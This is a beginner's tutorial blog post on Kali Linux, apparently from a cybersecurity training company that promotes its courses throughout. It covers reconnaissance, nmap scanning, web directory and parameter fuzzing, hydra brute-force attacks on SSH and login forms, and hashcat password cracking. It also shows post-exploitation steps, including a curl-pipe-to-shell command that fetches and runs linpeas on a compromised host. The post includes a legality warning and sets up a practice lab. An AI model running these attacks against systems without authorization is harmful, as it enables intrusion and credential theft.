If you have ever wanted to understand how attackers think, how systems get compromised, and how defenders can stay one step ahead, Kali Linux is where that journey begins. Built specifically for penetration testing and digital forensics, Kali is the industry-standard platform used by security professionals worldwide. This guide walks you through setting it up, understanding its core tools, and executing your first real-world recon and enumeration workflows.
Kali Linux is a Debian-based distribution maintained by Offensive Security. It ships with over 600 pre-installed security tools covering every phase of a penetration test, from reconnaissance through exploitation and post-exploitation. Unlike a general-purpose Linux distro, Kali is purpose-built: its kernel is patched for wireless injection support, its package repositories are security-focused, and its default environment is designed for offensive security workflows.
Professionals use Kali because it eliminates setup friction. Every serious tool is already there, properly configured, and maintained. For a beginner, that means you spend your time learning techniques rather than debugging dependencies.
For most beginners, running Kali as a virtual machine is the safest and most flexible approach. Download the pre-built VM image from the official Kali website, import it into VirtualBox or VMware, and you are operational within minutes.
Key settings to configure after import:
Installing Kali directly on hardware gives you full access to your network interface card, which matters for wireless security testing where drivers need direct hardware access. Use the standard installer ISO and follow the disk partitioning wizard. A dual-boot configuration alongside your primary OS is common in professional setups.
Kali is available through WSL2 on Windows 10 and 11. This option is convenient for command-line tooling and scripting practice, though it lacks full kernel support for tasks like raw packet injection. Install it with:
wsl --install -d kali-linux
[cta]
After launch, install the default tool metapackage:
sudo apt update && sudo apt install -y kali-linux-default
[cta]
Before running any tools, get oriented with the directory structure you will use constantly:
The most important directory for beginners is /usr/share/wordlists/. Run the following to extract and explore the default wordlist collection:
ls /usr/share/wordlists/
gzip -d /usr/share/wordlists/rockyou.txt.gz
wc -l /usr/share/wordlists/rockyou.txt
[cta]
That last command will show you over 14 million password entries, which gives you an immediate sense of what offline password cracking involves in practice.
Penetration testing follows a structured methodology. The first phase is reconnaissance, gathering information about your target without directly touching their systems. This is where open-source intelligence (OSINT) tools come in.
theHarvester pulls publicly available data from search engines, DNS records, and threat intelligence sources:
theHarvester -d targetdomain.com -b google,bing,dnsdumpster,crtsh -l 200
[cta]
This command queries Google, Bing, DNSDumpster, and Certificate Transparency logs for emails, subdomains, and associated hostnames tied to targetdomain.com. The -l 200 flag limits results to 200 entries per source.
recon-ng is a full-featured reconnaissance framework with a modular architecture. Think of it as a purpose-built OSINT workspace:
recon-ng
[recon-ng][default] > workspaces create client_engagement
[recon-ng][client_engagement] > marketplace install all
[recon-ng][client_engagement] > modules load recon/domains-hosts/hackertarget
[recon-ng][client_engagement] > options set SOURCE targetdomain.com
[recon-ng][client_engagement] > run
[cta]
The hackertarget module queries the HackerTarget API for host records. As you build your skills, you will layer multiple modules together, feeding output from one directly into the next, which is the core workflow of professional OSINT operators.
If you want structured training on how reconnaissance fits into full penetration test engagements, the courses at Redfox Cybersecurity Academy walk through each phase with hands-on lab exercises designed for real-world skill development.
Once passive recon establishes a target profile, active scanning maps the live attack surface. Nmap is the gold standard for network discovery and port scanning.
A basic TCP SYN scan against a target host:
nmap -sS -T4 -p- 192.168.1.100
[cta]
Breaking this down: -sS runs a stealthy SYN scan, -T4 sets an aggressive timing template for speed, and -p- scans all 65,535 ports rather than just the default top 1,000.
For service version detection and default script execution:
nmap -sV -sC -O -A 192.168.1.100 -oN scan_output.txt
[cta]
The flags here do significant work: -sV detects service versions, -sC runs the default Nmap Scripting Engine (NSE) scripts, -O attempts OS fingerprinting, -A enables aggressive mode combining all three, and -oN saves output to a file. Every professional engagement starts with output like this saved and organized.
NSE scripts let you probe specific vulnerabilities and misconfigurations directly from Nmap:
# Check for SMB vulnerabilities
nmap --script smb-vuln* -p 445 192.168.1.100
# Enumerate HTTP methods and headers
nmap --script http-methods,http-headers -p 80,443 192.168.1.100
# Brute-force SSH with a custom wordlist
nmap --script ssh-brute --script-args userdb=/usr/share/wordlists/metasploit/unix_users.txt 192.168.1.100
[cta]
NSE has over 600 scripts covering authentication, brute forcing, discovery, exploitation, and fuzzing. Learning to search and apply them is a core Kali skill.
A significant portion of modern penetration testing focuses on web applications. Kali ships with several purpose-built web assessment tools.
gobuster is a fast, concurrent directory and file brute-forcer written in Go:
gobuster dir \
-u https://target.com \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt,bak \
-t 50 \
-o gobuster_results.txt
[cta]
The -x flag appends file extensions to every wordlist entry, uncovering backup files and configuration scripts that developers sometimes leave accessible. The -t 50 flag runs 50 concurrent threads for speed.
ffuf (Fuzz Faster U Fool) is a highly flexible fuzzer that handles subdomain enumeration, parameter fuzzing, and virtual host discovery:
# Subdomain enumeration
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-u https://FUZZ.targetdomain.com \
-mc 200,301,302 \
-o ffuf_subdomains.json \
-of json
# Parameter fuzzing on a login endpoint
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-u https://target.com/login?FUZZ=test \
-mc 200 \
-fs 1234
[cta]
The -fs flag filters responses by size, which helps you cut through false positives by ignoring responses that match the default error page length.
Web application security is one of the most in-demand specializations in the field today. The Redfox Cybersecurity Academy curriculum includes dedicated modules on web exploitation techniques, giving you guided practice on realistic targets rather than guessing your way through.
hydra is the go-to tool for testing authentication on live network services:
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -V
# HTTP POST form login
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
192.168.1.100 http-post-form \
"/login.php:username=^USER^&password=^PASS^:Invalid credentials" \
-V -f
[cta]
The -f flag stops the attack on the first valid credential found, which is standard practice during time-limited engagements. The HTTP POST module requires you to specify the form path, the parameter names, and the failure string that indicates a failed login.
When you recover hashed credentials from a database dump or a system file, hashcat handles offline cracking at GPU-accelerated speeds:
# Identify hash type first with hashid
hashid '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi'
# Crack bcrypt hashes using rockyou
hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# Dictionary + rules attack for better coverage
hashcat -m 0 -a 0 md5_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
[cta]
The -m flag specifies hash mode (3200 for bcrypt, 0 for MD5), -a 0 selects dictionary attack mode, and the -r flag applies transformation rules that mutate wordlist entries to catch passwords like Password123! even if the base word password is in the list.
Understanding what happens after initial access is critical for both offensive operators and defenders. Even at the beginner level, you should be familiar with the core post-exploitation workflow.
linpeas.sh is a shell script that automates enumeration of local privilege escalation vectors on a compromised Linux host:
# Download and run directly (on target machine)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer and run with color output
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_output.txt
[cta]
LinPEAS checks for SUID binaries, writable cron jobs, weak sudo permissions, misconfigurations in services, and hundreds of other escalation vectors. The color-coded output highlights critical findings in red so you can triage quickly.
Once inside a network, mapping internal systems manually keeps your footprint small:
# Discover live hosts on the local subnet without DNS
nmap -sn 10.10.10.0/24 --exclude 10.10.10.1
# ARP scan for stealthy local discovery
arp-scan --localnet
# Check outbound connectivity from the foothold
curl -s https://ifconfig.me
[cta]
These techniques reflect what real penetration testers do during internal network assessments. Building this muscle memory early will serve you well as your skills grow.
No tool in this post should ever be used against systems you do not own or have explicit written permission to test. Building a local lab is the correct way to practice all of these techniques legally and safely.
A practical beginner lab setup on a single machine:
Setting up DVWA with Docker:
docker pull vulnerables/web-dvwa
docker run -d -p 80:80 vulnerables/web-dvwa
[cta]
Access DVWA at http://localhost after the container starts. Log in with admin/password, initialize the database, and set the security level to Low to start experimenting with SQL injection, XSS, file upload vulnerabilities, and more.
Building on a strong home lab foundation and pairing it with structured coursework accelerates your progress dramatically. The hands-on courses at Redfox Cybersecurity Academy are built around this methodology, combining guided instruction with practical exercises that mirror real engagements.
A few configuration changes make Kali significantly more usable for ongoing work:
# Keep your toolset current
sudo apt update && sudo apt full-upgrade -y
# Install SecLists for comprehensive wordlist coverage
sudo apt install seclists -y
# Install additional useful tools not in the default package
sudo apt install gobuster feroxbuster evil-winrm netexec -y
# Set up tmux for terminal session management
sudo apt install tmux -y
cp /usr/share/doc/tmux/examples/screen-keys.conf ~/.tmux.conf
[cta]
tmux in particular is a workflow multiplier. It lets you split your terminal into panes, keep long-running scans in the background, and maintain session persistence over SSH connections. Most professional testers consider it indispensable.
Kali Linux is not magic, and the tools it contains are only as effective as the practitioner behind them. What separates a skilled penetration tester from someone who just runs scripts is the ability to understand what each tool actually does, why its output matters, and how to chain findings together into a coherent attack narrative.
The path from beginner to competent practitioner runs through deliberate practice: building lab environments, working through structured training, and consistently exposing yourself to new techniques and scenarios. The reconnaissance, scanning, web enumeration, password attack, and post-exploitation workflows covered here represent the foundational skeleton of that skillset.
If you are ready to move beyond tutorials and into structured, hands-on ethical hacking education, Redfox Cybersecurity Academy offers comprehensive courses across penetration testing, web application security, and network exploitation, all built for practitioners who want skills that transfer directly to professional engagements.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
